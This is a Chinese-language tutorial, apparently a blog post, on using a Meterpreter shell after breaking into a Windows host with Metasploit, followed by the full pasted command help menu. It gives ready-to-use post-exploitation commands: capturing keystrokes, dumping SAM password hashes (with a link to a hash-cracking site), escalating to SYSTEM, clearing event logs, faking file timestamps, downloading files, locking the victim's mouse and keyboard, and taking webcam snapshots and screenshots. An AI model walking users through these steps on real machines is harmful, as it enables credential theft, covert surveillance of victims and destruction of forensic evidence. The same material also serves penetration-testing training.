当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用
当你看到了
Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051)
这就代表这你在目标系统上成功的获得了Meterpreter的Shell
sessions -l 用于查看你控制的电脑
你会看到:
Id Description Tunnel 4 meterpreter x86/win32 server-PC\Administrator @ SERVER-PC 192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1)
注意前面的ID号
你要控制哪台就输入:
meterpreter >sessions -i 4
例如本次案例ID号为:4
meterpreter >sysinfo
显示目标系统信息
meterpreter > backround
退出目标系统,回到Metasploit主界面
meterpreter > ps
显示目标系统上的进程
meterpreter > keyscan_start
监控目标系统键盘输入,停止监控为keyscan_stop
meterpreter > migrate
将你的Meterpreter移到另一个进程
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > ipconfig
显示对方网络信息
meterpreter > getuid
获取用户的服务器运行
meterpreter > shell
进入目标电脑,命令提示符
meterpreter > Idletime
目标电脑闲置了多长时间
meterpreter > Hashdump
导出对方SAM数据库里的内容,推荐一个hash破解网站:
http://www.objectif-securite.ch/products.php
meterpreter > getsystem
利用已自漏洞,自动提权为SYSTEM
meterpreter > clearev
清除事件日志
meterpreter > execute (某Windows指令)
在对方电脑上运行该指令
meterpreter > execute Usage: execute -f file [options] Executes a command on the remote machine. OPTIONS: -H Create the process hidden from view. -a <opt> The arguments to pass to the command. -c Channelized I/O (required for interaction). -d <opt> The 'dummy' executable to launch when using -m. -f <opt> The executable command to run. -h Help menu. -i Interact with the process after creating it. -k Execute process on the meterpreters current desktop -m Execute from memory. -s <opt> Execute process in a given session as the session user -t Execute process with currently impersonated thread token meterpreter >timetomp
修改文件时间属性
meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34" 修改文件创建时间
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34" 修改文件修改时间
meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面
meterpreter > download (文件路径)
下载文件命令
例如下载C盘下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
downloading: c:\jzking121.txt -> jzking121.txt
downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路径中要有两个\\
Upload指令跟Download指令类似!
meterpreter > shutdown
关闭目标计算机,reboot为重启计算机
meterpreter >screenshot
获取目标电脑,屏幕截图
meterpreter > uictl enable keyboard 启用目标使用键盘
meterpreter > uictl disable mouse 禁止目标使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
目标系统的摄像头列表
meterpreter > webcam_snap
从指定的摄像头,拍摄照片
meterpreter > search -d c:\\ -f 1.jpg
搜索目标电脑,C盘1.jpg文件
meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions migrate Migrate the server to another process quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- clearev Clear the event log drop_token Relinquishes any active impersonation token. execute Execute a command getpid Get the current process identifier getprivs Attempt to enable all privileges available to the current process getuid Get the user that the server is running as kill Terminate a process ps List running processes reboot Reboots the remote computer reg Modify and interact with the remote registry rev2self Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- enumdesktops List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl Control some of the user interface components Stdapi: Webcam Commands ======================= Command Description ------- ----------- webcam_list List webcams webcam_snap Take a snapshot from the specified webcam Priv: Elevate Commands ====================== Command Description ------- ----------- getsystem Attempt to elevate your privilege to that of local system. Priv: Password database Commands ================================ Command Description ------- ----------- hashdump Dumps the contents of the SAM database Priv: Timestomp Commands ======================== Command Description ------- ----------- timestomp Manipulate file MACE attributes |